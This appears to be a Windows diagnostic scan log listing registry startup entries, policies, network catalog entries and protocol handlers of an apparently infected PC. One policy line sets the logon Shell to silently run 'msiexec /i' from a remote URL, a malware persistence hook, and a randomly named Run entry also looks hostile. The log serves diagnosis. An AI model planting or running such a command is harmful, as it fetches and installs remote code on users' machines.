O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Steam] B:\Steam\steam.exe (Valve Corporation)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [vjafCOCuLf.exe] C:\Program Files\KeyboardNotification\YI55KUUTLD68SFMEKJE\vjafCOCuLf.exe File not found
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [WallpaperEngine] B:\Wallpaper Engine\wallpaper32.exe ()
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [XLaunchpad] B:\Ios\XLaunchpad\XLaunchpad.exe start File not found
O4 - Startup: C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Twitch.lnk = B:\Twitch\Bin\Twitch.exe (Twitch Interactive, Inc.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Infodelivery present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ForceActiveDesktopOn = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoRecentDocsHistory = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DSCAutomationHostEnabled = 2
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableFullTrustStartupTasks = 2
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableInstallerDetection = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableSecureUIAPaths = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableUIADesktopToggle = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableUwpStartupTasks = 2
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableVirtualization = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SupportFullTrustStartupTasks = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SupportUwpStartupTasks = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ValidateAdminCodeSignatures = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 2
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: undockwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: dontdisplaylastusername = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticecaption =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticetext =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: scforceoption = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: shutdownwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_BITMAP = 2
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_DIB = 8
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_DIBV5 = 17
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_OEMTEXT = 7
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_PALETTE = 9
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_TEXT = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_UNICODETEXT = 13
O7 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoSimpleNetIDList = 1
O7 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NolowDiskSpaceChecks = 1
O7 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: Shell = explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj82RkI2RjH2NdE4MUUcOWF3OWU8MkE8RYZQNUI2N8IyOH== /q
O8:[b]64bit:[/b] - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~3\Office12\EXCEL.EXE/3000 File not found
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~3\Office12\EXCEL.EXE/3000 File not found
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000001 [] - C:\Windows\SysNative\NapiNSP.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000002 [] - C:\Windows\SysNative\pnrpnsp.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000003 [] - C:\Windows\SysNative\pnrpnsp.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000004 [] - C:\Windows\SysNative\nlaapi.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000005 [] - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000006 [] - C:\Windows\SysNative\winrnr.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000001 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000002 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000003 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000004 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000005 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000006 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000007 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000008 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000009 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000010 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000011 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000012 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000013 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog_Before_Reset\Catalog_Entries64\000000000014 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000001 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000002 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000003 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000004 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000005 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000006 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000007 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000008 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000009 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000010 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000012 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000013 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - Protocol_Catalog9\Catalog_Entries64\000000000014 - C:\Windows\SysNative\mswsock.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000001 [] - C:\Windows\SysWOW64\NapiNSP.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000002 [] - C:\Windows\SysWOW64\pnrpnsp.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000003 [] - C:\Windows\SysWOW64\pnrpnsp.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Windows\SysWOW64\nlaapi.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000006 [] - C:\Windows\SysWOW64\winrnr.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000001 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000002 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000003 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000004 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000005 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000006 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000007 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000008 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000009 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000010 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000013 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog_Before_Reset\Catalog_Entries\000000000014 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000005 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000006 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000009 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000010 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000013 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O10 - Protocol_Catalog9\Catalog_Entries\000000000014 - C:\Windows\SysWOW64\mswsock.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\..Trusted Domains: localhost ([]* in Trusted sites)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{08aaedeb-727b-4885-9358-d8380deaf22e}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{48145fa6-a547-413e-8685-58ffc49ddba3}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{63e166f4-adf2-4aa1-a0ac-54936b277b43}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{a63a897d-e570-4a8c-993f-efcafefac4fd}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{e380bf0f-93ce-4ed3-8b78-1929568c7722}: DhcpNameServer = 192.168.1.1
O18:[b]64bit:[/b] - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\dvd {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysNative\MSVidCtl.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysNative\itss.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\Windows\SysNative\inetcomm.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysNative\urlmon.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysNative\itss.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\tbauth {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysNative\tbauth.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\tv {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\Windows\SysNative\MSVidCtl.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysNative\mshtml.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\windows.tbauth {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysNative\tbauth.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)
O18 - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\dvd {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysWOW64\MSVidCtl.dll (Microsoft Corporation)
O18 - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysWOW64\itss.dll (Microsoft Corporation)
O18 - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll (Microsoft Corporation)
O18 - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)
O18 - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\Windows\SysWOW64\inetcomm.dll (Microsoft Corporation)
O18 - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\Windows\SysWOW64\urlmon.dll (Microsoft Corporation)
O18 - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\SysWOW64\itss.dll (Microsoft Corporation)
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll (Microsoft Corporation)
O18 - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)
O18 - Protocol\Handler\tbauth {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll (Microsoft Corporation)
O18 - Protocol\Handler\tv {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\Windows\SysWOW64\MSVidCtl.dll (Microsoft Corporation)
O18 - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll (Microsoft Corporation)
O18 - Protocol\Handler\windows.tbauth {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll (Microsoft Corporation)
O18 - Protocol\Handler\wlmailhtml {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll (Microsoft Corporation)
O18 - Protocol\Handler\wlpg {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Filter\application/octet-stream {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Filter\application/x-complus {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Filter\application/x-msdownload {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysNative\mscoree.dll (Microsoft Corporation)
O18 - Protocol\Filter\application/octet-stream {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
O18 - Protocol\Filter\application/x-complus {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
O18 - Protocol\Filter\application/x-msdownload {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\WINDOWS\SysNative\SystemPropertiesPerformance.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\WINDOWS\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O22:[b]64bit:[/b] - SharedTaskScheduler: {1984DD45-52CF-49cd-AB77-18F378FEA264} - FencesShellExt - C:\Program Files (x86)\Stardock\Fences\FencesMenu64.dll (Stardock)
O28:[b]64bit:[/b] - HKLM ShellExecuteHooks: {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - No CLSID value found.
O28:[b]64bit:[/b] - HKLM ShellExecuteHooks: {8275F18C-3381-11E7-B974-64006A5CFC23} - No CLSID value found.
O28:[b]64bit:[/b] - HKLM ShellExecuteHooks: {D2BF470E-ED1C-487F-AAAA-2BD8835EB6CE} - C:\WINDOWS\SysNative\mscoree.dll (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {D2BF470E-ED1C-487F-AAAA-2BD8835EB6CE} - C:\WINDOWS\SysWow64\mscoree.dll (Microsoft Corporation)
O29:[b]64bit:[/b] - HKLM SecurityProviders - (credssp.dll) - C:\WINDOWS\SysWow64\credssp.dll (Microsoft Corporation)
O29 - HKLM SecurityProviders - (credssp.dll) - C:\WINDOWS\SysWow64\credssp.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Authentication Packages - (msv1_0) - C:\WINDOWS\SysNative\msv1_0.dll (Microsoft Corporation)
O30 - LSA: Authentication Packages - (msv1_0) - C:\WINDOWS\SysWow64\msv1_0.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (kerberos) - C:\WINDOWS\SysNative\kerberos.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (msv1_0) - C:\WINDOWS\SysNative\msv1_0.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (schannel) - C:\WINDOWS\SysNative\schannel.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (wdigest) - C:\WINDOWS\SysNative\wdigest.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (tspkg) - C:\WINDOWS\SysNative\tspkg.dll (Microsoft Corporation)
O30:[b]64bit:[/b] - LSA: Security Packages - (pku2u) - C:\WINDOWS\SysNative\pku2u.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (kerberos) - C:\WINDOWS\SysWow64\kerberos.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (msv1_0) - C:\WINDOWS\SysWow64\msv1_0.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (schannel) - C:\WINDOWS\SysWow64\schannel.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (wdigest) - C:\WINDOWS\SysWow64\wdigest.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (tspkg) - C:\WINDOWS\SysWow64\tspkg.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (pku2u) - C:\WINDOWS\SysWow64\pku2u.dll (Microsoft Corporation)
O31 - SafeBoot: AlternateShell - cmd.exe
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

MsConfig:64bit - State: "services" - Reg Error: Key error.
MsConfig:64bit - State: "bootini" - Reg Error: Key error.

